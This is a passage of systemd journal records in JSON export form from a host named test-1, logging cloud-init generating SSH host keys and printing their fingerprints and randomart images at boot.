"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a3;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=a83f8735ae8f9030", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| . .oo |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a4;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=dbae0df9fa9d5f8e", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|..o o=.. 
|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a5;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=a516beba4bfef383", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|.+. +.+ oE+ |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a6;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=45b99d8cac7df288", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|oo=oo= * = o |" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a7;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=4b3fe0ad6ac79608", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|+=o+o.o S + . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a8;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=9d48e74fac6405ae", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o.+. . 
= + o |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a9;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=7bef29980580dbf8", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|.o . . B . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2aa;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=8ac3dd8ded6f813a", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o . + . 
|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ab;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=69755eccf423747f", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ac;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=bd50657e96b79a01", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+----[SHA256]-----+" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ad;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=8404d615c5ac7141", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Generating public/private ecdsa key pair." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ae;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=ff1320d32445e830", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your identification has been saved in /etc/ssh/ssh_host_ecdsa_key." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2af;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=5c01b1f22bbb1520", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your public key has been saved in /etc/ssh/ssh_host_ecdsa_key.pub." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b0;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2faa7d692a908da5", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key fingerprint is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b1;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=5750a197ed3e2276", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "SHA256:ik8suaV9cNf+I5fd9XYM2qoT9vF08FA3bGdE4oH0qQo root@test-1" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b2;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=547039c05140533d", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key's randomart image is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b3;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=b912c77efc7e4919", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+---[ECDSA 256]---+" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b4;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=7bb4603c042c98da", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| ...+oo|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b5;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=7ee5b8e9f9dc40d2", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| .o B=|" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b6;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=ff7cff72ff6643ba", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| =o+|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b7;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=8accf5e248f6a562", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| .o |" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b8;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=b5ce2a231b940b45", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| E .. + |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b9;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=add86eb92dc43132", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| +....+.o o +|" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ba;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2ef7cc08ed3fac95", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", 